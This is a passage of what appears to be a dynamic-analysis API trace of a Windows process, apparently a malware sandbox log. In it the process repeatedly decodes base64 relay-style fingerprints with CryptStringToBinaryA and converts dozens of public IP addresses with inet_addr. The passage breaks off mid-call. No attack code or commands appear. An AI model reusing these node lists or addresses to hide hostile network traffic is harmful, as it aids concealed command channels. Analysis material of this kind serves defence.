[0119.316] CryptStringToBinaryA (in: pszString="Azj59VER/o41cOfeEX7zr5mcwdc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.316] malloc (_Size=0x74) returned 0x3d696b0 [0119.316] inet_addr (cp="185.225.17.3") returned 0x311e1b9 [0119.316] CryptStringToBinaryA (in: pszString="A0qksw933w/hg2Aup/glH/LPG6I", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.316] CryptStringToBinaryA (in: pszString="A0qksw933w/hg2Aup/glH/LPG6I", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.316] malloc (_Size=0x74) returned 0x3d69830 [0119.316] inet_addr (cp="89.34.27.49") returned 0x311b2259 [0119.316] CryptStringToBinaryA (in: pszString="A1OWJp9tAFA9F2XfNu0bIDoCjXQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.316] CryptStringToBinaryA (in: pszString="A1OWJp9tAFA9F2XfNu0bIDoCjXQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.316] malloc (_Size=0x74) returned 0x3d69530 [0119.316] inet_addr (cp="195.123.209.91") returned 0x5bd17bc3 [0119.317] CryptStringToBinaryA (in: pszString="A2fh/6txasP0GM+3y7O9uUA82cs", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.317] CryptStringToBinaryA (in: pszString="A2fh/6txasP0GM+3y7O9uUA82cs", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.317] malloc (_Size=0x74) returned 0x3d694b0 [0119.317] inet_addr (cp="213.80.102.27") returned 0x1b6650d5 [0119.317] CryptStringToBinaryA (in: pszString="A2p8021vepfHtK+JbZ8Rq3GfDfc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.317] CryptStringToBinaryA (in: pszString="A2p8021vepfHtK+JbZ8Rq3GfDfc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.317] malloc (_Size=0x74) returned 0x3d69130 [0119.317] inet_addr (cp="51.158.152.93") returned 0x5d989e33 [0119.317] CryptStringToBinaryA (in: pszString="A279LmHeo9L+5ZhhukJF5N6GQRI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.317] CryptStringToBinaryA (in: pszString="A279LmHeo9L+5ZhhukJF5N6GQRI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.317] malloc (_Size=0x74) returned 0x3d69c30 [0119.317] inet_addr (cp="45.154.255.74") returned 0x4aff9a2d [0119.317] CryptStringToBinaryA (in: pszString="A3tsYNrU3zL9opv0WNXIyBaqjz4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.317] CryptStringToBinaryA (in: pszString="A3tsYNrU3zL9opv0WNXIyBaqjz4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.317] malloc (_Size=0x74) returned 0x3d691b0 [0119.317] inet_addr (cp="5.154.174.241") returned 0xf1ae9a05 [0119.317] CryptStringToBinaryA (in: pszString="A3vNDr332589Vi2ifUY/D3jxSUs", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] CryptStringToBinaryA (in: pszString="A3vNDr332589Vi2ifUY/D3jxSUs", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] malloc (_Size=0x74) returned 0x3d695b0 [0119.318] inet_addr (cp="37.120.171.188") returned 0xbcab7825 [0119.318] CryptStringToBinaryA (in: pszString="A4j04ZTiE4wwoTmoKqP1MGxFbFM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] CryptStringToBinaryA (in: pszString="A4j04ZTiE4wwoTmoKqP1MGxFbFM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] malloc (_Size=0x74) returned 0x3d69d30 [0119.318] inet_addr (cp="170.75.164.40") returned 0x28a44baa [0119.318] CryptStringToBinaryA (in: pszString="A4ww0q0FMUfJHvsSkVJ+1iHX0bE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] CryptStringToBinaryA (in: pszString="A4ww0q0FMUfJHvsSkVJ+1iHX0bE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] malloc (_Size=0x74) returned 0x3d69db0 [0119.318] inet_addr (cp="82.221.131.71") returned 0x4783dd52 [0119.318] CryptStringToBinaryA (in: pszString="A5ADwyDZmA4KdA8QehqcE8mcX+M", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] CryptStringToBinaryA (in: pszString="A5ADwyDZmA4KdA8QehqcE8mcX+M", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] malloc (_Size=0x74) returned 0x3d69cb0 [0119.318] inet_addr (cp="45.79.159.52") returned 0x349f4f2d [0119.318] CryptStringToBinaryA (in: pszString="A5EPKFoz82WDjsZu8sLvdU0EZ2A", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] CryptStringToBinaryA (in: pszString="A5EPKFoz82WDjsZu8sLvdU0EZ2A", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.318] malloc (_Size=0x74) returned 0x3d69b30 [0119.319] inet_addr (cp="148.251.237.219") returned 0xdbedfb94 [0119.319] CryptStringToBinaryA (in: pszString="A6M8NFT8D5rGlm8S+khpmfWiKJY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.319] CryptStringToBinaryA (in: pszString="A6M8NFT8D5rGlm8S+khpmfWiKJY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.319] malloc (_Size=0x74) returned 0x3d69230 [0119.319] inet_addr (cp="96.66.15.147") returned 0x930f4260 [0119.319] CryptStringToBinaryA (in: pszString="A6bBGFYROIPOifdCHOdPO0GAtQQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.319] CryptStringToBinaryA (in: pszString="A6bBGFYROIPOifdCHOdPO0GAtQQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.319] malloc (_Size=0x74) returned 0x3d698b0 [0119.320] inet_addr (cp="95.111.254.9") returned 0x9fe6f5f [0119.320] CryptStringToBinaryA (in: pszString="A6taiCI99u9KgBvMdl1zde9cWko", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.320] CryptStringToBinaryA (in: pszString="A6taiCI99u9KgBvMdl1zde9cWko", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.320] malloc (_Size=0x74) returned 0x3d692b0 [0119.320] inet_addr (cp="192.195.83.138") returned 0x8a53c3c0 [0119.320] CryptStringToBinaryA (in: pszString="A8MGnoFOKW6xh3brYbHst1Ttif4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.320] CryptStringToBinaryA (in: pszString="A8MGnoFOKW6xh3brYbHst1Ttif4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.320] malloc (_Size=0x74) returned 0x3d69930 [0119.320] inet_addr (cp="81.7.10.193") returned 0xc10a0751 [0119.320] CryptStringToBinaryA (in: pszString="A8i2A66+wKxMH3PjsMyWoCoE2D0", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.320] CryptStringToBinaryA (in: pszString="A8i2A66+wKxMH3PjsMyWoCoE2D0", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.320] malloc (_Size=0x74) returned 0x3d69e30 [0119.320] inet_addr (cp="31.31.76.123") returned 0x7b4c1f1f [0119.320] CryptStringToBinaryA (in: pszString="A8/5AGBGEIfTT/t7SFw60wFDd1w", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.320] CryptStringToBinaryA (in: pszString="A8/5AGBGEIfTT/t7SFw60wFDd1w", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.320] malloc (_Size=0x74) returned 0x3d69330 [0119.321] inet_addr (cp="54.38.187.54") returned 0x36bb2636 [0119.321] CryptStringToBinaryA (in: pszString="A9og/XHO0YjIt2UugZQcUGck26Y", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.321] CryptStringToBinaryA (in: pszString="A9og/XHO0YjIt2UugZQcUGck26Y", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.321] malloc (_Size=0x74) returned 0x3d69430 [0119.321] inet_addr (cp="198.74.57.57") returned 0x39394ac6 [0119.321] CryptStringToBinaryA (in: pszString="A9wIHkQJYxAG78068Tr6rytVP/w", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.321] CryptStringToBinaryA (in: pszString="A9wIHkQJYxAG78068Tr6rytVP/w", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.321] malloc (_Size=0x74) returned 0x3d69630 [0119.321] inet_addr (cp="185.32.221.201") returned 0xc9dd20b9 [0119.321] CryptStringToBinaryA (in: pszString="A+D07icnMWAXc/SOZCQNOoiWpeM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.321] CryptStringToBinaryA (in: pszString="A+D07icnMWAXc/SOZCQNOoiWpeM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.321] malloc (_Size=0x74) returned 0x3d69bb0 [0119.322] inet_addr (cp="95.216.15.16") returned 0x100fd85f [0119.322] CryptStringToBinaryA (in: pszString="A+LHwOykuAEtfEXRIyAwbjUN1fg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.322] CryptStringToBinaryA (in: pszString="A+LHwOykuAEtfEXRIyAwbjUN1fg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.322] malloc (_Size=0x74) returned 0x3d69730 [0119.322] inet_addr (cp="103.199.161.166") returned 0xa6a1c767 [0119.322] CryptStringToBinaryA (in: pszString="A+n35mnI+RHF7sPsCUUzFR+FdCA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.322] CryptStringToBinaryA (in: pszString="A+n35mnI+RHF7sPsCUUzFR+FdCA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.322] malloc (_Size=0x74) returned 0x3d699b0 [0119.322] inet_addr (cp="217.155.40.118") returned 0x76289bd9 [0119.322] CryptStringToBinaryA (in: pszString="A+593ZMdkrtXuBswOK58QKCKsjc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.322] CryptStringToBinaryA (in: pszString="A+593ZMdkrtXuBswOK58QKCKsjc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.322] malloc (_Size=0x74) returned 0x3d69a30 [0119.322] inet_addr (cp="123.30.128.138") returned 0x8a801e7b [0119.322] CryptStringToBinaryA (in: pszString="A/E8tTlnsIYhFFkorShCh4NuNIo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.322] CryptStringToBinaryA (in: pszString="A/E8tTlnsIYhFFkorShCh4NuNIo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.322] malloc (_Size=0x74) returned 0x3d6a830 [0119.323] inet_addr (cp="185.150.162.27") returned 0x1ba296b9 [0119.323] CryptStringToBinaryA (in: pszString="A/JLr9HB4b1HhoAWNeQaKKQTkLc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] CryptStringToBinaryA (in: pszString="A/JLr9HB4b1HhoAWNeQaKKQTkLc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] malloc (_Size=0x74) returned 0x3d6a130 [0119.323] inet_addr (cp="87.121.98.34") returned 0x22627957 [0119.323] CryptStringToBinaryA (in: pszString="A/JnZvFLC3tdIkYQg4B9MTQpo08", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] CryptStringToBinaryA (in: pszString="A/JnZvFLC3tdIkYQg4B9MTQpo08", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] malloc (_Size=0x74) returned 0x3d6a1b0 [0119.323] inet_addr (cp="5.196.71.24") returned 0x1847c405 [0119.323] CryptStringToBinaryA (in: pszString="A/xcUtmkV38odi575kK7Wo8emAM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] CryptStringToBinaryA (in: pszString="A/xcUtmkV38odi575kK7Wo8emAM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] malloc (_Size=0x74) returned 0x3d6a6b0 [0119.323] inet_addr (cp="79.140.41.117") returned 0x75298c4f [0119.323] CryptStringToBinaryA (in: pszString="BACF/+HojPSKsLWyqzkDV1jGXww", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] CryptStringToBinaryA (in: pszString="BACF/+HojPSKsLWyqzkDV1jGXww", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] malloc (_Size=0x74) returned 0x3d6adb0 [0119.323] inet_addr (cp="178.63.27.82") returned 0x521b3fb2 [0119.323] CryptStringToBinaryA (in: pszString="BAlgXoNDVip5D/6EbLO9fARCn3A", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.323] CryptStringToBinaryA (in: pszString="BAlgXoNDVip5D/6EbLO9fARCn3A", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] malloc (_Size=0x74) returned 0x3d6a730 [0119.324] inet_addr (cp="158.69.204.36") returned 0x24cc459e [0119.324] CryptStringToBinaryA (in: pszString="BAp0QjSaKskiM8JHDWxPK9Au3xU", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] CryptStringToBinaryA (in: pszString="BAp0QjSaKskiM8JHDWxPK9Au3xU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] malloc (_Size=0x74) returned 0x3d6acb0 [0119.324] inet_addr (cp="216.218.134.12") returned 0xc86dad8 [0119.324] CryptStringToBinaryA (in: pszString="BBFTINEeJYPsP3+UStLUGfm4QQI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] CryptStringToBinaryA (in: pszString="BBFTINEeJYPsP3+UStLUGfm4QQI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] malloc (_Size=0x74) returned 0x3d6ab30 [0119.324] inet_addr (cp="85.214.156.28") returned 0x1c9cd655 [0119.324] CryptStringToBinaryA (in: pszString="BBZGZAqzBup0sAGWboYWmwTMiNI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] CryptStringToBinaryA (in: pszString="BBZGZAqzBup0sAGWboYWmwTMiNI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] malloc (_Size=0x74) returned 0x3d6aa30 [0119.324] inet_addr (cp="199.249.230.79") returned 0x4fe6f9c7 [0119.324] CryptStringToBinaryA (in: pszString="BB4/zAJi5a8aouyJoTVljAfA2ak", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] CryptStringToBinaryA (in: pszString="BB4/zAJi5a8aouyJoTVljAfA2ak", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.324] malloc (_Size=0x74) returned 0x3d6a230 [0119.325] inet_addr (cp="193.81.209.60") returned 0x3cd151c1 [0119.325] CryptStringToBinaryA (in: pszString="BCvN8tNteu4HDghtrUtX8nsvEUM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.325] CryptStringToBinaryA (in: pszString="BCvN8tNteu4HDghtrUtX8nsvEUM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.325] malloc (_Size=0x74) returned 0x3d6abb0 [0119.325] inet_addr (cp="73.170.195.217") returned 0xd9c3aa49 [0119.325] CryptStringToBinaryA (in: pszString="BEPZjAxE0+DmI4eQNF21Yk20Gyg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.325] CryptStringToBinaryA (in: pszString="BEPZjAxE0+DmI4eQNF21Yk20Gyg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.325] malloc (_Size=0x74) returned 0x3d6ad30 [0119.325] inet_addr (cp="89.34.27.59") returned 0x3b1b2259 [0119.325] CryptStringToBinaryA (in: pszString="BE5kfzTtpKyXXtrWKMTpvP/x+wg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.325] CryptStringToBinaryA (in: pszString="BE5kfzTtpKyXXtrWKMTpvP/x+wg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.325] malloc (_Size=0x74) returned 0x3d6ac30 [0119.325] inet_addr 